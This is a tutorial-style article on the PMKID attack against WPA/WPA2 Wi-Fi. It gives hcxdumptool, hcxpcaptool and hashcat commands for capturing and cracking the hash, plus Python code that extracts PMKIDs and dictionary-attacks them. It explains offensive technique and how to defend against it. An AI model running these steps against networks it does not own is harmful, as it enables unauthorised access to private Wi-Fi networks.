December 4, 2019

How Does the New WPA/WPA2 Attack Crack WiFi Network Passwords?

A new method for cracking WPA/WPA2 exposes WiFi networks to attackers who capture a hash derived from the network's pre-shared key and then recover the password offline.

The technique was discovered while researching attacks on the recently released WPA3 security standard, which is far harder to break because it uses a new key establishment protocol, Simultaneous Authentication of Equals (SAE).

The Wi-Fi Alliance's WPA3 security standard, the successor to WPA2, is meant to protect Wi-Fi networks for the next decade with new capabilities that improve both personal and enterprise networks.

Unlike earlier attacks, this one does not need a complete EAPOL 4-way handshake to compromise a WPA/WPA2 pre-shared key.

According to Jens Steube, the developer of the Hashcat password cracking tool, the new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

Steube reports that the attack works against all 802.11i/p/q/r networks with roaming functions enabled; it is not yet known which vendors or how many routers are affected.

How Does the WPA / WPA2 PMKID Attack Work:

The Robust Security Network Information Element (RSN IE) is an optional field in 802.11 management frames; the WPA/WPA2 password attack works on the RSN IE carried in a single EAPOL frame.

The RSN IE carries the Pairwise Master Key ID (PMKID), which the access point sends in its first EAPOL message as soon as a station tries to authenticate. An attacker therefore obtains it simply by attempting to authenticate to the router, without waiting for a legitimate client.
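To make the location of the PMKID concrete, here is an added Python example (not code from the article, from hcxdumptool or from hashcat) that builds a constructed message 1 of the 4-way handshake and pulls the PMKID out of its Key Data field. On the air the PMKID travels as a PMKID KDE: a vendor-specific element (tag 0xdd) with the RSN OUI 00-0f-ac and data type 4. The frame layout follows the EAPOL-Key descriptor (95 fixed bytes before Key Data when the MIC is 16 bytes); the PMKID and ANONCE values are copied from the article's sample output, and everything else in the frame is constructed for the demo.

```python
import struct
from typing import Optional

EAPOL_KEY_TYPE = 3          # 802.1X packet type: EAPOL-Key
DESCRIPTOR_RSN = 2          # Key Descriptor Type for RSN (WPA2); WPA1 uses 254
EAPOL_KEY_FIXED_LEN = 95    # descriptor type .. Key Data Length, with a 16-byte MIC
KEY_INFO_PAIRWISE = 1 << 3
KEY_INFO_ACK = 1 << 7
KEY_INFO_MIC = 1 << 8
KDE_TAG = 0xDD              # vendor-specific element tag used for KDEs
RSN_OUI = b"\x00\x0f\xac"   # IEEE 802.11 RSN OUI
KDE_PMKID = 4               # KDE data type: PMKID (16 bytes)


def pmkid_kde(pmkid: bytes) -> bytes:
    """Encode a PMKID as a KDE: dd 14 00 0f ac 04 <16-byte PMKID>."""
    assert len(pmkid) == 16
    return bytes([KDE_TAG, 4 + len(pmkid)]) + RSN_OUI + bytes([KDE_PMKID]) + pmkid


def build_message1(anonce: bytes, key_data: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key frame for message 1 of the 4-way handshake (AP -> station).

    Key Information 0x008a = descriptor version 2, Pairwise set, Key ACK set, no MIC,
    which is how message 1 looks on the air.
    """
    assert len(anonce) == 32
    body = struct.pack("!BHHQ", DESCRIPTOR_RSN, 0x008A, 16, replay_counter)  # type, info, key len (CCMP), replay
    body += anonce
    body += bytes(16)   # EAPOL-Key IV
    body += bytes(8)    # Key RSC
    body += bytes(8)    # Key ID / reserved
    body += bytes(16)   # Key MIC (not used in message 1, field is zero)
    body += struct.pack("!H", len(key_data)) + key_data
    return struct.pack("!BBH", 2, EAPOL_KEY_TYPE, len(body)) + body   # 802.1X: version, type, body length


def parse_eapol_key(eapol: bytes) -> Optional[dict]:
    """Split an EAPOL-Key frame into its fields; None if it is not one or is truncated."""
    if len(eapol) < 4:
        return None
    _version, ptype, body_len = struct.unpack("!BBH", eapol[:4])
    body = eapol[4:4 + body_len]
    if ptype != EAPOL_KEY_TYPE or len(body) < EAPOL_KEY_FIXED_LEN:
        return None
    desc_type, key_info, _key_len, replay = struct.unpack("!BHHQ", body[:13])
    key_data_len = struct.unpack("!H", body[93:95])[0]
    key_data = body[95:95 + key_data_len]
    if len(key_data) != key_data_len:
        return None   # frame cut short; do not trust partial Key Data
    return {"descriptor": desc_type, "key_info": key_info, "replay": replay,
            "anonce": body[13:45], "key_data": key_data}


def is_message1(key_info: int) -> bool:
    """Message 1: Pairwise and Key ACK set, MIC bit clear."""
    return bool(key_info & KEY_INFO_PAIRWISE) and bool(key_info & KEY_INFO_ACK) and not (key_info & KEY_INFO_MIC)


def extract_pmkid(eapol: bytes) -> Optional[bytes]:
    """Return the PMKID carried in message 1's Key Data, or None if the AP sent none."""
    frame = parse_eapol_key(eapol)
    if frame is None or not is_message1(frame["key_info"]):
        return None
    data = frame["key_data"]
    i = 0
    while i + 2 <= len(data):               # walk tag/length/value elements
        tag, length = data[i], data[i + 1]
        value = data[i + 2:i + 2 + length]
        if len(value) < length:
            return None                     # malformed element
        if tag == KDE_TAG and length == 20 and value[:3] == RSN_OUI and value[3] == KDE_PMKID:
            return value[4:20]
        i += 2 + length
    return None


# Constructed sample frames; PMKID and ANONCE are copied from the article's sample output.
SAMPLE_PMKID = bytes.fromhex("2582a8281bf9d4308d6f5731d0e61c61")
SAMPLE_ANONCE = bytes.fromhex("9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69")
# Minimal RSN IE (tag 0x30): version 1, group CCMP, pairwise CCMP, AKM PSK, no capabilities.
SAMPLE_RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")

M1_WITH_PMKID = build_message1(SAMPLE_ANONCE, pmkid_kde(SAMPLE_PMKID), replay_counter=62083)
M1_WITHOUT_PMKID = build_message1(SAMPLE_ANONCE, SAMPLE_RSN_IE, replay_counter=62083)

if __name__ == "__main__":
    found = extract_pmkid(M1_WITH_PMKID)
    print("PMKID from message 1:", found.hex() if found else "none")
    print("PMKID from frame without KDE:", extract_pmkid(M1_WITHOUT_PMKID))
```

An AP that does not support PMKSA caching sends message 1 with no PMKID KDE, which is why the second frame yields nothing; that is the case in which the attack does not apply and the attacker falls back to capturing a full handshake.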

"Here we can see that the captured PMKID is calculated by HMAC-SHA1, with the PMK as the key and the data part as the concatenation of a fixed string label "PMK Name", the MAC address of the access point, and the station MAC address."

To use this new attack, you need the following tools:

1. hcxdumptool v4.2.0 or higher
2. hcxtools v4.2.0 or higher
3. hashcat v4.2.0 or higher

Step 1

Run hcxdumptool to request the PMKID from the AP and dump the received frames to a file in pcapng format:

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

The output looks like this:

start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Step 2

Run hcxpcaptool to convert the captured data from pcapng into a hash format that hashcat accepts. (Newer hcxtools releases replace hcxpcaptool with hcxpcapngtool, which writes hashcat's combined 22000 format; the steps here use the tool versions listed above.)

$ ./hcxpcaptool -z test.16800 test.pcapng

The written file has one line per captured PMKID, split into four '*'-separated columns (the ESSID is hex-encoded):

PMKID * MAC AP * MAC Station * ESSID

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

While not required, Steube recommends also passing the -E, -I and -U options to hcxpcaptool. The resulting files can be fed to hashcat as wordlists and typically produce good results.

-E retrieve possible passwords from WiFi traffic (this list will additionally include ESSIDs)
-I retrieve identities from WiFi traffic
-U retrieve usernames from WiFi traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Step 3

Finally, run hashcat with the new PMKID hash mode, 16800 (WPA-PMKID-PBKDF2). The file is handled like any other hash type, so any attack mode can be used; the command below runs a mask attack:

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

The mask tries six lowercase letters followed by the literal "t!". When a candidate matches, hashcat reports the cracked WPA-PMKID-PBKDF2 hash together with the passphrase.
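The following Python example, added here and not part of the article or of hashcat, carries the formula quoted earlier (PMK from PBKDF2-HMAC-SHA1 over the passphrase and ESSID, PMKID from HMAC-SHA1 over "PMK Name", the AP MAC and the station MAC) through to what hashcat does in Step 3: it builds the 16800 line for a constructed network, parses it back, and runs a small dictionary attack against it. The network name, MAC addresses, passphrase and wordlist are constructed for the demo; the only real value is the IEEE 802.11 PSK test vector (passphrase "password", SSID "IEEE") used as a self-check of the PMK derivation.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA/WPA2-Personal
PMK_LEN = 32               # PMK is 256 bits
PMKID_LEN = 16             # HMAC-SHA1 output truncated to 128 bits


def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes). This is the expensive step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, PBKDF2_ITERATIONS, PMK_LEN)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA), the formula quoted in the article."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:PMKID_LEN]


def mac_bytes(mac: str) -> bytes:
    """Accept aa:bb:cc:dd:ee:ff, aa-bb-..., or bare hex."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def format_16800(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, essid: bytes) -> str:
    """One line in hashcat's 16800 format: PMKID*MAC_AP*MAC_STA*ESSID, all hex-encoded."""
    return "*".join(x.hex() for x in (pmkid, mac_ap, mac_sta, essid))


def parse_16800(line: str) -> Tuple[bytes, bytes, bytes, bytes]:
    """Split and validate one 16800 line as written by hcxpcaptool -z."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError("expected 4 '*'-separated fields")
    pmkid, mac_ap, mac_sta, essid = (bytes.fromhex(f) for f in fields)
    if len(pmkid) != PMKID_LEN or len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("bad PMKID or MAC length")
    if not 1 <= len(essid) <= 32:
        raise ValueError("ESSID must be 1..32 bytes")
    return pmkid, mac_ap, mac_sta, essid


def crack_16800(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one 16800 line; returns the matching passphrase or None."""
    pmkid, mac_ap, mac_sta, essid = parse_16800(line)
    for cand in candidates:
        if not 8 <= len(cand) <= 63:     # WPA passphrases are 8..63 characters; skip the rest
            continue
        if compute_pmkid(derive_pmk(cand, essid), mac_ap, mac_sta) == pmkid:
            return cand
    return None


# IEEE 802.11 PSK test vector 1: passphrase "password", SSID "IEEE".
IEEE_TEST_PMK_HEX = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def ieee_test_vector_ok() -> bool:
    """Sanity check of derive_pmk against the published test vector."""
    return derive_pmk("password", b"IEEE").hex() == IEEE_TEST_PMK_HEX


# Constructed demo network (not the article's capture): build the 16800 line an attacker would obtain.
DEMO_ESSID = b"CoffeeShopWiFi"
DEMO_MAC_AP = mac_bytes("4c:ed:fb:12:34:56")
DEMO_MAC_STA = mac_bytes("00:11:22:33:44:55")
DEMO_PASSPHRASE = "summer2019"
DEMO_LINE = format_16800(compute_pmkid(derive_pmk(DEMO_PASSPHRASE, DEMO_ESSID), DEMO_MAC_AP, DEMO_MAC_STA),
                         DEMO_MAC_AP, DEMO_MAC_STA, DEMO_ESSID)
DEMO_WORDLIST = ["password", "short", "letmein1", "qwertyuiop", "summer2019", "winter2019"]

if __name__ == "__main__":
    print("test vector ok:", ieee_test_vector_ok())
    print("16800 line:", DEMO_LINE)
    print("cracked:", crack_16800(DEMO_LINE, DEMO_WORDLIST))
```

Every candidate costs one PBKDF2 run of 4096 HMAC-SHA1 iterations before the cheap PMKID comparison, which is exactly why the attack changes how the hash is obtained but not how hard it is to crack: a long random passphrase is as safe against this as against a captured four-way handshake.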

With earlier WiFi attacks, the attacker has to sit back and wait until a legitimate user connects to the target network, capture the four-way handshake, and only then crack the key from it.

The new attack only requires the attacker to attempt to authenticate to the wireless network in order to obtain the PMKID; no user needs to be connected at the time.

This makes the hash that depends on the pre-shared key far easier to obtain. Cracking it afterwards is the same offline job as before and remains hard against a long, complex passphrase, since each candidate costs a full PBKDF2 computation.
